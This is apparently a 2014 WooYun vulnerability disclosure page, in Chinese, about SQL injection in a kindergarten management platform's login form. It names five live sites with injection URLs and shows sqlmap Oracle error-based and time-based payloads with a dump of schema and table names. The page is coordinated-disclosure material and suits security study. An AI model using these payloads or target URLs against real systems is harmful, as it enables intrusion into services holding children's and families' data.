某教育类家园通平台通用Oracle注射（涉及某市多数幼儿园）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069025

漏洞标题：某教育类家园通平台通用Oracle注射（涉及某市多数幼儿园）

漏洞作者：魇

提交时间：2014-07-21 12:28

修复时间：2014-10-19 12:30

公开时间：2014-10-19 12:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-21：细节已通知厂商并且等待厂商处理中
2014-07-25：厂商已经确认，细节仅向厂商公开
2014-07-28：细节向第三方安全合作伙伴开放
2014-09-18：细节向核心白帽子及相关领域专家公开
2014-09-28：细节向普通白帽子公开
2014-10-08：细节向实习白帽子公开
2014-10-19：细节向公众公开

简要描述：

洞主真是该死@
祖国的花朵你也敢动？
PS：不敢...
http://wooyun.org/bugs/wooyun-2014-068108/trace/4289181838efaaf9206d5f3083d215e9
（待审核提交日期 2014-07-10，至今一直未审，麻烦审核顺便审下累感不爱..)

详细说明：

厂商：伍道教育科技有限公司，官网：（http://www.bbjyt.net/）
产品：Baby家园通幼儿园信息化管理平台
百度搜索关键字：武汉市伍道教育科技有限公司版权所有电话：027-85495166 ICP备案:鄂ICP备13003049号
用户量级（搜索引擎结果）：

官网精品园所展示：

格林紫润幼儿园，爱弥儿江南明珠幼儿园，贝比堡竹叶海幼儿园，深圳市深圳大学诺德假日幼儿园，朝阳幼儿园，银河星幼儿园，圃蕾国际幼儿园，东方格林嘉园国际幼儿园，春光幼儿园，武汉市长江九鼎幼儿园，超级宝贝国际幼儿园，奥之星幼儿园，薇湖幼儿园，丰竹园幼儿园，贝比堡汉水熙园幼儿园.....等等都在使用该平台。
官方还有APP，下载了个看下没帐号就卸了..

漏洞证明：

幼儿园信息化管理平台登录处用户名过滤不严存在注入，以下示例：

枚举5例仅供cncert国家互联网应急中心及乌云审核测试：

（GET）
1. http://www.bbjyt.com/Frmlogin.aspx?id=admin%27&pwd=amdin
2. http://hbnykx.cn/Frmlogin.aspx?id=admin%27&pwd=admin
3. http://haichuanmei.com.cn/Frmlogin.aspx?id=admin%27&pwd=admin
4. http://vanroad.com/Frmlogin.aspx?id=admin%27&pwd=admin
5. http://ahbbt.cn/Frmlogin.aspx?id=admin%27&pwd=admin

其中http://haichuanmei.com.cn/跑表演示：

---
Place: GET
Parameter: id
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=admin' AND 5563=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)
||CHR(116)||CHR(120)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (5563=5563) THEN 1
ELSE 0 END) FROM DUAL)||CHR(113)||CHR(115)||CHR(119)||CHR(108)||CHR(113)||CHR(62
))) FROM DUAL)-- jIgx&pwd=admin
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=admin' AND 6320=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(69)||CHR(
122)||CHR(114),5)-- QqRS&pwd=admin
---
[16:45:14] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[16:45:14] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[16:45:14] [INFO] fetching database (schema) names
[16:45:14] [INFO] the SQL query used returns 21 entries
available databases [21]:
[*] BABYTEST
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] NEWBABYFF
[*] NEWBABYFFBK
[*] NYKX
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SMS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YCGJCB
Database: NEWBABYFF
[99 tables]
+-------------------+
| BABYRESOURCE      |
| BABYRESOURCETYPE  |
| BBJ               |
| BBJJS             |
| BBJXS             |
| BDWJS             |
| BDWYMCD           |
| BDX               |
| BGNCX             |
| BGW               |
| BGWGN             |
| BJSGW             |
| BJXS              |
| BKGXJLB           |
| BKP               |
| BKPRY             |
| BKQJL             |
| BKQJXX            |
| BNJ               |
| BPYM              |
| BPYZG             |
| BSJX              |
| BXQ               |
| BXQZC             |
| BXS               |
| BXTGNCS           |
| BXTRZB            |
| BYEY              |
| BYH               |
| BYHLX             |
| BYMCD             |
| BZXSPCLASS        |
| BZXSPCONFIG       |
| B_M_SCHOOLDEVICE  |
| B_WEATHER         |
| B_WISH            |
| B_WISHRECORD      |
| MESSAGE           |
| MYRESOURCELIBRARY |
| ONLINEVIDEO       |
| ONLINEVIDEOFILE   |
| PLAN_TABLE        |
| RESOURCELIBRARY   |
| RESOURCETYPE      |
| RESSUBJECT        |
| SUBJECTTYPE       |
| SUBJECT_RES       |
| THEME             |
| WZMBB             |
| WZMBSXB           |
| WZYEYSXB          |
| XSSJTJB           |
| YBBRZ             |
| YBBRZPL           |
| YBJFX             |
| YBJFXPL           |
| YBJGG             |
| YBJLYB            |
| YBJLYBHF          |
| YCYZP             |
| YCYZPMX           |
| YCYZPPL           |
| YEZSLX            |
| YJSPY             |
| YJSSB             |
| YJSSBPL           |
| YJXJH             |
| YJXJHMB           |
| YJXJHMBMX         |
| YJXJHSD           |
| YJYSC             |
| YJYSCLY           |
| YJYSCMB           |
| YLX               |
| YLXPL             |
| YSP               |
| YSPMB             |
| YSPMBMX           |
| YSPSD             |
| YTCPY             |
| YTCPYXS           |
| YTYQS             |
| YTYQSPL           |
| YXC               |
| YXCXP             |
| YXCXPPL           |
| YXWGG             |
| YYETJB            |
| YYEYXC            |
| YYEYXCMX          |
| YYEZS             |
| YYJJY             |
| YYJJYHF           |
| YZBJJH            |
| YZPXX             |
| YZSXX             |
| YZXBM             |
| YZYBX             |
| YZYBXMB           |
+-------------------+

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2014-07-25 22:14

厂商回复：

CNVD确认所述情况，已经根据软件生产厂商公开联系方式（邮箱），向其通报漏洞情况。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069025

漏洞标题：某教育类家园通平台通用Oracle注射（涉及某市多数幼儿园）

相关厂商：cncert国家互联网应急中心

漏洞作者：魇

提交时间：2014-07-21 12:28

修复时间：2014-10-19 12:30

公开时间：2014-10-19 12:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069025

漏洞标题：某教育类家园通平台通用Oracle注射（涉及某市多数幼儿园）

相关厂商：cncert国家互联网应急中心

漏洞作者： 魇

提交时间：2014-07-21 12:28

修复时间：2014-10-19 12:30

公开时间：2014-10-19 12:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-069025"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：魇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源魇@乌云